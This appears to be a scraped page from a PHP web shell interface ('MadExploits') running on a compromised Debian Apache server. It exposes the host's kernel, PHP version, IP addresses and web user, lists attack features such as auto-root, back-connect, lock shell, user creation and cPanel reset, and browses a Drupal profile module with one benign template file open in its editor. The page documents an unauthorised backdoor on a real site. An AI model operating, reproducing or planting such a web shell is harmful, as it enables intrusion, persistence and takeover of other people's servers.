Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.118.151
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
profile /
[ HOME SHELL ]
Name
Size
Permission
Action
profile-block.tpl.php
1.33
KB
-rw-r--r--
profile-listing.tpl.php
1.61
KB
-rw-r--r--
profile-wrapper.tpl.php
819
B
-rw-r--r--
profile.admin.inc
17.7
KB
-rw-r--r--
profile.css
168
B
-rw-r--r--
profile.info
574
B
-rw-r--r--
profile.install
4.76
KB
-rw-r--r--
profile.js
2.63
KB
-rw-r--r--
profile.module
22.51
KB
-rw-r--r--
profile.pages.inc
4.41
KB
-rw-r--r--
profile.test
18.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile-listing.tpl.php
<?php /** * @file * Default theme implementation for displaying a user and their profile data * for member listing pages. * * @see profile-wrapper.tpl.php * where all the data is collected and printed out. * * Available variables: * - $account: User's account object. * - $user_picture: Image configured for the account linking to the users page. * - $name: User's account name linking to the users page. * - $profile: Keyed array of all profile fields that are set as visible * in member list pages (configured by site administrators). It also needs * to have a value in order to be present. * * Each $field in $profile contains: * - $field->title: Title of the profile field. * - $field->value: Value of the profile field. * - $field->type: Type of the profile field, i.e., checkbox, textfield, * textarea, selection, list, url or date. * * Since $profile is keyed, a direct print of the field is possible. Not * all accounts may have a value for a profile so do a check first. If a field * of "last_name" was set for the site, the following can be used. * * <?php if (isset($profile['last_name'])): ?> * <div class="field last-name"> * <?php print $profile['last_name']->title; ?>:<br /> * <?php print $profile['last_name']->value; ?> * </div> * <?php endif; ?> * * @see template_preprocess_profile_listing() */ ?> <div class="profile clearfix"> <?php print $user_picture; ?> <div class="name"> <?php print $name; ?> </div> <?php foreach ($profile as $field): ?> <div class="field"> <?php print $field->value; ?> </div> <?php endforeach; ?> </div>
Close